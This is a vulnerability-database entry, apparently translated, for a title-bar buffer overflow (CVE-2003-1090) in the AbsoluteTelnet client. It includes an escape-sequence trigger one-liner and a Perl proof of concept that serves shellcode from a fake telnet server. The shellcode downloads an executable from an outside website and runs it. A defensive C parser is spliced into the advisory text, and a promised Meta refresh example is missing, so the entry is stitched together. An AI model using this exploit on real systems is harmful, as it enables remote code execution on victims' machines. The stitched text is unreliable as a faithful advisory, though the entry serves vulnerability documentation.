Celestial Software AbsoluteTelnet title bar remote buffer overflow vulnerability

Vulnerability ID: 1107184    Vulnerability type: Boundary condition error
Published: 2003-02-06    Updated: 2005-10-20
CVE ID: CVE-2003-1090
CNNVD ID: CNNVD-200302-001
Platform: Windows    CVSS score: 10.0
|Source
https://www.exploit-db.com/exploits/22229
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200302-001
|Details
AbsoluteTelnet is a terminal client program for the Win32 platform that supports several protocols, including Telnet, SSH1 and SSH2. AbsoluteTelnet lacks proper bounds checking on an overlong title bar string; a local or remote attacker can exploit this to overflow a buffer and possibly execute arbitrary instructions on the system with the privileges of the process user. When the program's title bar (titlebar) is set to an overlong string, the running AbsoluteTelnet overwrites the return address on the stack, e.g.:
export KNUD=`perl -e 'print "A"x296'`
echo -ne "\033]0;$KNUD\007"
A user can be induced to 'cat' a file to carry out this attack. When AbsoluteTelnet is set as the "default telnet client", a web page containing the following Meta refresh can trigger this kind of problem:
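As an added example (not code from AbsoluteTelnet, the advisory or this page), the following C function shows the bounds check the text says is missing: it parses the OSC "set window title" sequence ESC ] 0 ; title BEL that the echo command above emits and caps the copy at the size of the destination buffer instead of trusting the length of the received title. It goes slightly beyond the advisory's case by also accepting the ST terminator (ESC \). TITLE_MAX = 256, the status enum, the function names and the 1024-byte scratch buffer are assumptions for illustration; the 296-byte title is a constructed input mirroring the advisory's example.

```c
/* Added example: a bounded parser for the OSC "set window title" sequence,
 * ESC ] 0 ; <title> BEL (or ESC \ as terminator). Not AbsoluteTelnet's code;
 * TITLE_MAX, the type and the function names are assumptions. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define ESC 0x1B
#define BEL 0x07
#define TITLE_MAX 256   /* assumed size of a client's fixed title buffer */

typedef enum {
    OSC_NOT_FOUND = 0,  /* input does not begin with ESC ] 0 ; */
    OSC_INCOMPLETE,     /* no terminator before the end of the input */
    OSC_OK,             /* title stored in full */
    OSC_TRUNCATED       /* title longer than the buffer; stored truncated */
} osc_status;

/* Parse one OSC 0 sequence from in[0..len). The title is copied into
 * `title` (capacity `cap`, always NUL-terminated) and *consumed receives the
 * number of input bytes the sequence spanned. The copy is bounded by `cap`,
 * which is the check whose absence the advisory describes. */
osc_status parse_osc_title(const unsigned char *in, size_t len,
                           char *title, size_t cap, size_t *consumed)
{
    size_t i, n;
    osc_status st = OSC_OK;

    if (cap == 0 || len < 4 || in[0] != ESC || in[1] != ']' ||
        in[2] != '0' || in[3] != ';')
        return OSC_NOT_FOUND;

    /* locate the terminator: BEL, or the ST form ESC '\' */
    for (i = 4; i < len; i++) {
        if (in[i] == BEL)
            break;
        if (in[i] == ESC && i + 1 < len && in[i + 1] == '\\')
            break;
    }
    if (i >= len) {
        title[0] = '\0';
        return OSC_INCOMPLETE;
    }
    n = i - 4;                  /* title length as received */
    if (n > cap - 1) {          /* never copy more than the buffer holds */
        n = cap - 1;
        st = OSC_TRUNCATED;
    }
    memcpy(title, in + 4, n);
    title[n] = '\0';
    *consumed = (in[i] == BEL) ? i + 1 : i + 2;
    return st;
}

/* Demonstration helper: build ESC ] 0 ; <n x 'A'> BEL (constructed input;
 * the advisory used n = 296), parse it into a TITLE_MAX buffer and return the
 * status; *stored gets the stored title length, *used the bytes consumed. */
osc_status demo_title(size_t n, size_t *stored, size_t *used)
{
    unsigned char in[1024];
    char title[TITLE_MAX];
    osc_status st;

    if (n > sizeof in - 5)
        n = sizeof in - 5;
    memcpy(in, "\x1b]0;", 4);
    memset(in + 4, 'A', n);
    in[4 + n] = BEL;
    *used = 0;
    st = parse_osc_title(in, n + 5, title, sizeof title, used);
    *stored = strlen(title);
    return st;
}

/* Thin wrappers so each result can be checked by name. */
int demo_status(size_t n) { size_t s, u; return (int)demo_title(n, &s, &u); }
size_t demo_stored(size_t n) { size_t s, u; demo_title(n, &s, &u); return s; }
size_t demo_used(size_t n) { size_t s, u; demo_title(n, &s, &u); return u; }

int main(void)
{
    size_t s = 0, u = 0;
    osc_status st = demo_title(296, &s, &u);
    printf("296-byte title: status %d, stored %zu bytes, consumed %zu bytes\n",
           (int)st, s, u);
    return 0;
}
```

With the advisory's 296 x 'A' title the parser reports OSC_TRUNCATED, stores 255 bytes plus the terminating NUL and consumes all 301 input bytes; an unbounded copy of the same title into a 256-byte stack buffer is the condition the advisory describes. Returning the consumed length also lets the caller resynchronise on the next byte after the sequence rather than re-scanning the title bytes as terminal input.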
|Exploit (EXP)
source: http://www.securityfocus.com/bid/6785/info

A buffer overflow vulnerability was reported for AbsoluteTelnet. The vulnerability exists due to insufficient bounds checking performed when setting the title bar of the client. 

An attacker can exploit this vulnerability by enticing a victim user to view a website with malicious HTML tags. This will cause the buffer overflow condition. Code execution may be possible.

#!/usr/bin/perl
#UK2-SEC presents..
#absolute telnet 2.00 buffer overflow
#proof of concept code
#based on [email protected] advisory
#thanx knud..
#
#Coded by:
#deadbeat
#[email protected]
#
#UK2-SEC...
use strict;
use warnings;
use IO::Socket;
my $user = "new";
my $pass = "iamnew";
# Byte-string escapes (\x..) restored; the backslashes were lost in extraction.
my $shellcode =
"\xF0\x00\x00\x00\x58\x55\x89\xE5\x81\xEC\x2C\x00\x00\x00\x89\x45\xD4\xC7\x45\xFC".
"\x00\x00\xE6\x77\x8B\x45\xFC\x66\x81\x38\x4D\x5A\x75\x7C\x05\x3C\x00\x00\x00\x8B".
"\x18\x03\x5D\xFC\x66\x81\x3B\x50\x45\x75\x6B\x81\xC3\x78\x00\x00\x00\x8B\x33\x03".
"\x75\xFC\x81\xC6\x18\x00\x00\x00\xAD\x89\x45\xF4\xAD\x03\x45\xFC\x89\x45\xF0\xAD".
"\x03\x45\xFC\x89\x45\xEC\xAD\x03\x45\xFC\x89\x45\xE8\x31\xFF\x8B\x45\xD4\x05\x0F".
"\x00\x00\x00\x89\x45\xDC\xC7\x45\xD8\x0D\x00\x00\x00\xE8\x2D\x00\x00\x00\x8B\x55".
"\xDC\x89\x55\xE0\x8B\x45\xD4\x89\x45\xDC\xC7\x45\xD8\x0F\x00\x00\x00\xE8\x15\x00".
"\x00\x00\x8B\x55\xDC\x89\x55\xE4\x8B\x45\xE0\x89\xD3\xE9\x77\x00\x00\x00\xE9\xF6".
"\x00\x00\x00\x31\xC0\x89\x45\xF8\x8B\x7D\xF8\x3B\x7D\xF4\x7D\x43\x47\x89\x7D\xF8".
"\x31\xC0\x8B\x45\xF8\xC1\xE0\x02\x8B\x5D\xEC\x01\xC3\x8B\x03\x03\x45\xFC\x89\xC7".
"\x8B\x75\xDC\x8B\x4D\xD8\xF3\xA6\x75\xD6\x31\xC0\x8B\x45\xF8\xD1\xE0\x8B\x5D\xE8".
"\x01\xC3\x31\xC0\x66\x8B\x03\xC1\xE0\x02\x8B\x5D\xF0\x01\xD8\x8B\x18\x03\x5D\xFC".
"\x89\x5D\xDC\xC3\xE8\x0B\xFF\xFF\xFF\x47\x65\x74\x50\x72\x6F\x63\x41\x64\x64\x72".
"\x65\x73\x73\x00\x4C\x6F\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x41\x00\xE9\x82\x00".
"\x00\x00\x5F\x55\x89\xE5\x81\xEC\x1C\x00\x00\x00\x89\x45\xE8\x89\x5D\xE4\x89\x7D".
"\xFC\xC7\x45\xEC\x06\x00\x00\x00\x8B\x45\xFC\x89\x45\xF4\x05\x46\x00\x00\x00\x89".
"\x45\xF0\xE8\x27\x00\x00\x00\xC7\x45\xEC\x03\x00\x00\x00\x8B\x45\xFC\x05\x4C\x00".
"\x00\x00\x89\x45\xF4\x05\x3C\x00\x00\x00\x89\x45\xF0\xE8\x08\x00\x00\x00\x8B\x45".
"\xFC\xE9\xCB\x00\x00\x00\x8B\x45\xF4\x50\xFF\x55\xE8\x85\xC0\x74\x20\x89\x45\xF8".
"\x8B\x75\xF0\x8B\x4D\xEC\x8B\x5D\xF4\x31\xC0\xAC\x01\xC3\x8B\x45\xF8\x60\x53\x50".
"\xFF\x55\xE4\x89\x03\x61\xE2\xEA\xC3\x90\xEB\xFD\xE8\x79\xFF\xFF\xFF\x6B\x65\x72".
"\x6E\x65\x6C\x33\x32\x2E\x64\x6C\x6C\x00\x56\x69\x72\x74\x75\x61\x6C\x41\x6C\x6C".
"\x6F\x63\x00\x5F\x6C\x63\x72\x65\x61\x74\x00\x5F\x6C\x77\x72\x69\x74\x65\x00\x5F".
"\x6C\x63\x6C\x6F\x73\x65\x00\x57\x69\x6E\x45\x78\x65\x63\x00\x45\x78\x69\x74\x50".
"\x72\x6F\x63\x65\x73\x73\x00\x0D\x1A\x22\x2A\x32\x3A\x77\x69\x6E\x69\x6E\x65\x74".
"\x2E\x64\x6C\x6C\x00\x49\x6E\x74\x65\x72\x6E\x65\x74\x4F\x70\x65\x6E\x41\x00\x49".
"\x6E\x74\x65\x72\x6E\x65\x74\x4F\x70\x65\x6E\x55\x72\x6C\x41\x00\x49\x6E\x74\x65".
"\x72\x6E\x65\x74\x52\x65\x61\x64\x46\x69\x6C\x65\x00\x0C\x1A\x2B\x90\x31\xC0\x50".
"\x8B\x8E\x6A\x00\x00\x00\xFF\x51\x3A\xE9\xE9\x00\x00\x00\x5E\x89\x86\x6A\x00\x00".
"\x00\x68\x04\x00\x00\x00\x68\x00\x10\x00\x00\x68\x9F\x86\x01\x00\x68\x00\x00\x00".
"\x00\x8B\x8E\x6A\x00\x00\x00\xFF\x51\x0D\x89\x86\x00\x00\x00\x00\x31\xC0\x50\x50".
"\x50\x50\x50\x8B\x8E\x6A\x00\x00\x00\xFF\x51\x58\x89\x86\x04\x00\x00\x00\x31\xC0".
"\x50\x50\x50\x50\x8D\x86\x08\x00\x00\x00\x50\x8B\x86\x04\x00\x00\x00\x50\x8B\x8E".
"\x6A\x00\x00\x00\xFF\x51\x66\x89\x86\x04\x00\x00\x00\x8D\x86\x62\x00\x00\x00\x50".
"\x68\x9F\x86\x01\x00\x8B\x86\x00\x00\x00\x00\x50\x8B\x86\x04\x00\x00\x00\x50\x8B".
"\x8E\x6A\x00\x00\x00\xFF\x51\x77\x68\x00\x00\x00\x00\x8D\x86\x58\x00\x00\x00\x50".
"\x8B\x8E\x6A\x00\x00\x00\xFF\x51\x1A\x89\x86\x66\x00\x00\x00\x8B\x86\x62\x00\x00".
"\x00\x50\x8B\x86\x00\x00\x00\x00\x50\x8B\x86\x66\x00\x00\x00\x50\x8B\x8E\x6A\x00".
"\x00\x00\xFF\x51\x22\x8B\x86\x66\x00\x00\x00\x50\x8B\x8E\x6A\x00\x00\x00\xFF\x51".
"\x2A\x68\x05\x00\x00\x00\x8D\x86\x58\x00\x00\x00\x50\x8B\x8E\x6A\x00\x00\x00\xFF".
"\x51\x32\xE9\x06\xFF\xFF\xFF\xE8\x12\xFF\xFF\xFF\x00\x00\x00\x00\x00\x00\x00\x00".
"\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x64\x65\x6C\x69\x6B\x6F\x6E\x2E\x64".
"\x65\x2F\x6B\x6C\x65\x69\x6E\x2E\x65\x78\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x6B\x6C\x65\x69\x6E\x2E\x65\x78\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x90";
my $shell_len = length($shellcode);
print "Length of shellcode is: $shell_len\n";
# 261 filler bytes followed by the shellcode
my $buf = "\x00" x 261;
$buf .= $shellcode;
print "\nUK2-SEC presents..\n";
print "absolutetelnet 2.00 buffer overflow\n";
print "Should start POC on port:1331\n";
# Fake telnet server: accepts a client, checks the password, then sends the
# overlong title sequence (ESC ] 0 ... BEL) to the connected client.
my $server = IO::Socket::INET->new
(
   LocalPort => 1331,
   Type => SOCK_STREAM,
   Reuse => 1,
   Listen => 5
) or die "Couldn't open POC server...\n";
while (my $client = $server->accept()) {
   print $client "Welcome to localhost.localdomain\n";
   print $client "login using the password:iamnew\n";
   sleep 2;
   print $client "\n\nPassword: ";
   my $passcheck = <$client>;
   $passcheck = "" unless defined $passcheck;
   $passcheck =~ s/\r?\n$//;          # strip the telnet line ending
   unless ($passcheck eq $pass) {     # original used '=' (assignment) here
      print $client "\n\nWrong password..\n";
      close $client;
      next;
   }
   print $client "\n\nUser verified..\n";
   print $client "\033]0$buf\007";
}
close $server;
|References

Source: US-CERT Vulnerability Note: VU#666073
Name: VU#666073
Link: http://www.kb.cert.org/vuls/id/666073
Source: XF
Name: absolutetelnet-title-bar-bo(11265)
Link: http://xforce.iss.net/xforce/xfdb/11265
Source: BID
Name: 6785
Link: http://www.securityfocus.com/bid/6785
Source: BUGTRAQ
Name: 20030206 AbsoluteTelnet 2.00 buffer overflow.
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=104454984001076&w=2
Source: OSVDB
Name: 16024
Link: http://www.osvdb.org/16024
